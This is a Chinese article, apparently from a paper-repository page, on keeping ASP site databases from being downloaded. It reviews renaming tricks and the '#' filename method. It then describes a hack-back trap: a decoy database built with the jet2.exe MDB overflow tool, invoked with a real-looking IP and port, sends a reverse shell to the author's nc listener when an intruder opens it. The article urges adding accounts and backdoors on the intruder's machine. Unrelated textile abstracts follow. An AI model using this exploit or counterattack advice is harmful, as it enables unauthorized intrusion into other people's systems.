妙招防止数据库被下载

来源 :电脑知识与技术 | 被引量 : 0次 | 上传用户:caonidaye_bibibi
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  很多动态站点大量地应用了数据库,数据库理所当然成为一个站点的核心文件。一旦数据库被人下载,极有可能被恶意人士用来破坏网站,或者窃取资料。实在痛心啊!有什么方法可以防止数据库被入侵者下载呢?
  
  网上讲解了好多关于防止数据库被下载的办法,我在这里为大家先简单小结一下,也算是个回顾。方法一:修改原始数据库的文件名并在conn.asp中做相应修改;方法二:修改数据库后缀为ASP;方法三:在数据库文件名中加入“#”字符;方法四:加密数据库(不过效果几乎为0);方法五:将数据库文件放在其他目录而不放在网站目录;方法六:我自创的方法,稍后将会介绍。
  上面五种方法也是一般管理员经常用到的方法,在这里我大体解释一下:
  方法一中一般我们喜欢用别人的整站程序,由于许多整站程序都是公开的,这样一来数据库的路径也是公开的,如果不修改的话攻击者可以通过IE或flashget下载网站数据库;
  方法二中将数据库后缀改为ASP能防止攻击者用IE下载数据库,但却不能防止用flashget下载,只要在flashget中填入下载地址便可将其下载,原因是因为IE只会将其做为asp文件进行解析,而不会认为其是数据库文件让你下载;
  方法三中加入“#”字符原理是因为通过IE下载文件时只能识别 “#”号前名的部分,对于“#”后面的会自动去掉,比如数据库名为jsj#h.mdb,当你在IE中输入http://www.xxxx.com/jsj#h.mdb的时候,IE却会在网站目录中寻找jsj(当然也不是jsj.mdb),由于网站目录并中没有jsj这个文件,所以导致下载终止。但是当我们将http://www.xxxx.com/jsj#h.mdb这个地址改为http://www.xxxx.com/jsj%23h.mdb的时候却可以通过IE正常下载了,有人又问如果地址是http://www.xxxx.com/jsj#h.asp呢?很简单,直接通过flashget就可以下载了。
  方法五在此我演示一下,原来的conn.asp文件如图1,数据库的文件名为myleaf.asp,站点目录名为jsj,我们在与站点同一级目录下建立一个名为data的文件夹,将原来的myleaf.asp数据库文件移动到data目录下,再将conn.asp改为图2所示即可,这样一来就算暴露了conn.asp文件,攻击者也不能将数据库下载下来,因为数据库文件不在站点文件夹中。
  下面我介绍下自己的方法。说出来其实也很简单。步骤如下:
  1.将原来数据库myleaf.asp的名字改为my%23leaf.asp;
  2.在conn.asp中做相应修改。只需两步即可。这样一来不管攻击者是通过IE还是flashget够无法下载数据库。
  为了验证我们做个实验,我在本地已经搭建了web服务器,在IE地址栏中输入http://127.0.0.1/my%23leaf.asp,如图3,显示网页错误,同样我们用flashget下载地址为http://127.0.0.1/my%23leaf.asp时也出现了错误,如图4,5。很明显实验成功!
  在这里我们还可以愚弄下入侵者,如何愚弄呢?我们在网站目录下建立一个名为my#leaf.asp文件,里面随便写些文字,当对方用flashget试图下载my%23leaf.asp数据库时下载的却是my#leaf.asp这个文件。同样当入侵者在IE中输入http://127.0.0.1/my%23leaf.asp时,显示的也只是my#leaf.asp中的内容,如图6。(因为flashget和IE都将%23解析为#了)
  为了给入侵者一个教训让他以后能够收敛些,我们可以反向入侵他们,如何做到这一点呢?用到的工具是jet2.exeMDB溢出工具,JET2的使用格式为:jet2 1 你的IP端口,很明显是反弹溢出。我们在命令行下输入jet2 218.27.161.49 1314 如图7,这样在桌面上便会生成一个名为db1.mdb的数据库文件,我们将此文件名改为my#leaf.asp放入网站目录,同时我们在本地用nc监听,如图8。
  当攻击者试图下载真正的数据库文件my%23leaf.asp时下的是my#leaf.asp文件,当他们下载完毕将my#leaf.asp改为my#leaf.mdb并试图用辅臣数据库浏览器打开这个mdb文件时候才出现了图9的界面,我们成功得到了攻击的systemshell。
  得到systemshell后还有我们所不能做的吗?加帐号也好,留后门也好,都随便你了,尽情发挥!
其他文献
通过对CGHR511型和LH151型两种形式的粘胶短纤维精炼设备的结构及性能的对比分析得出结论是:LH151型比CGHR511型,结构简单,外形美观,性能可靠,操作维修方便,自动化程度高,而且
为了分析钳板机构的运动学特性,对FA266型精梳机钳板机构的结构进行了分析并建立了运动学模型,使得钳板机构的开口角能够通过计算机方便地计算出来,在此基础上进一步对钳板机构
【正】近日,曾退出美国织袜业的派纳袜业重新建起新厂房,购进新设备并将公司名称改为帕纳袜业,意欲重新回归袜业市场。据悉,帕纳袜业已经投资850万美元更新厂房设备,向意大利
<正>瑞士Loepfe Brother有限公司成功研制开发的WEFTMASTER Falcon-I传感器,可用于监测单根纱线中出现的更小的细节、纺飞花、更小的粗节和条干不匀等疵点,甚至还可以检测到
本文利用化学、金相、SEM、断口宏观分析等手段,对纺丝箱熔体管路爆裂原因进行分析。结果表明爆裂原因与客户操作不当导致管内压力过高有关,并依此在与熔体管路所承受压力有关
【正】山东省纺织科学研究院近日推出了产业纺织品特殊功能系列检测仪器,涉及航空、汽车内饰材料、防护服、地毯等系列测试产品。其中,防热阻燃功能性测试仪器能够快速、准确
2011年2月22Et,中国纺织机械器材工业协会在江苏省无锡市组织召开了由经纬纺织机械股份有限公司承担的“十一五”国家科技支撑计划“新一代纺织设备”项目“全自动转杯纺纱机
纺织是一个工序连续性很强的行业,从原材料加工到终端产品,使用到的纺织机械种类繁多。工序连续化是实现网络化、智能化的最基本的也是最首要的前提。
2011年"慈星杯"全国毛纺纱线与毛针织服装产业链技术交流论坛8月3日~4日在浙江省慈溪市举行。本次论坛由中国毛纺织行业协会、中国纺织机械器材工业协会共同主办,宁波慈星股份
介绍粗纱机牵伸传动、锭子传动、筒管传动的安装步骤、技术要求和注意事项。